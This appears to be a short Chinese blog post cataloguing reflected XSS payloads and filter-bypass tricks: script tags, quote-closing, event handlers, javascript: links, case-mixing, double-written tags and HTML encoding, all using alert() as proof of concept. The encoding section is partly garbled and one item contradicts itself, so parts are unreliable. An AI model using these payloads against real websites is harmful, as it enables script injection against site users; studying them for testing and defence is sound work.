反射型xss的常用语法

Xss反射型常用语法:

  1. 普通语法: <script>alert(1)</script>
  2. 构造闭合语法: "><script>alert(1)</script>
  3. 当引号被转义时的语法: 1' οnclick='alert(2)' 再次点击输入框时就会出现弹窗
  4. 当3.的双引号不行时则考虑使用双引号:1 "onclick"=alert(2)
  5. 当</>被过滤时便不能用标签可以考虑使用出发事件: 1" οnmοuseοver="alert(1)"
  6. 当5.的双引号不行时则考虑使用单引号: 1' οnmοuseοver='alert(1)'
  7. 当上述几种都不行时可以考虑使用a标签:11"><a href="javascript:alert(1)">
  8. 大小写绕过:11"><a HREF="javascript:alert(1)"> "><sCript>alert(1)</scRipt>

<SCRIPT>alert(1)</SCRIPT>

9.双写绕过:"><SCRSCRIPTIPT>alert(/xss/)</SCRSCRIPTIPT>

10.Html编码绕过:

javaSCRIPT:alert(1)

这里属于直接编码所所有的进行

把所需要过滤的字段进行html编码就可以进行绕过,这里绕过的时比如

href href

SCRIPT SCRIPT

相关推荐
黑客老陈3 小时前
新手小白如何挖掘cnvd通用漏洞之存储xss漏洞(利用xss钓鱼)
运维·服务器·前端·网络·安全·web3·xss
黑客Jack16 小时前
防御 XSS 的七条原则
安全·web安全·xss
hackeroink1 天前
【2024版】最新推荐好用的XSS漏洞扫描利用工具_xss扫描工具
前端·xss
网络安全Jack4 天前
[网络安全]XSS之Cookie外带攻击姿势详析
安全·web安全·xss
儒道易行4 天前
【bWAPP】XSS跨站脚本攻击实战
前端·web安全·网络安全·xss
Ares-Wang7 天前
Web 安全 跨站 跨域 XSS CSRF
前端·安全·xss
网络安全成叔11 天前
XSS(跨站攻击)
网络·安全·网络安全·漏洞·xss
儒道易行12 天前
【DVWA】XSS(Stored)
前端·网络安全·xss
网络安全King12 天前
XSS Challenges
网络·安全·web安全·xss